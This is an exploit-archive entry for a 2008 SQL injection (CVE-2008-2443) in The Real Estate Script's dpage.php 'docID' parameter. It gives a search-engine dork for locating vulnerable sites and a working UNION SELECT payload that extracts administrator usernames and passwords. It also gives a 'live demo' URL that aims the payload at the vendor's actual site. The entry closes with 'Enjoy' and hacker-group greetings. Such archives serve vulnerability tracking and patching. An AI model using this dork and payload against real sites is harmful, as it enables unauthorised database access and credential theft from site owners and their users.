EXPLOITS

The Real Estate Script - 'docID' SQL Injection

Author: HaCkeR_EgY
type: webapps
platform: php
port: 
date_added: 2008-05-12  
date_updated: 2016-11-29  
verified: 1  
codes: OSVDB-45150;CVE-2008-2443  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5610.txt  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########## Remote SQL Injection Vulnerability  ##############
                     Therealestatescript    [ dpage.php ]
#################################################

[$] Author : HaCkeR_EgY

[$] c0nTaCT : hacker_egy@hotmail.com

[$] DownlOad : www.therealestatescript.com

[$] Price :  The Real Estate Script is on sale for $99.95 $59.95 until June 1st.
====================================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[$] Dork :    inurl:dpage.php?docID

[$] ExPLo!T : http://www.example.com/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin

[$] L!ve Demo : http://www.therealestatescript.com/demo/dpage.php?docID=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+from+admin

--Note-- : Enjoy !!! .............  (:

====================================================

[$] Thanx : MY Brotha and MY Master " Abo Mohamed "

[$] Greetz : F!resell , Mohamed el Arab ,Mr.SQL , DaRk MaStEr , H-T Team ,Gold_M , Stack-Terrorist , Jiki Team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2008-05-13]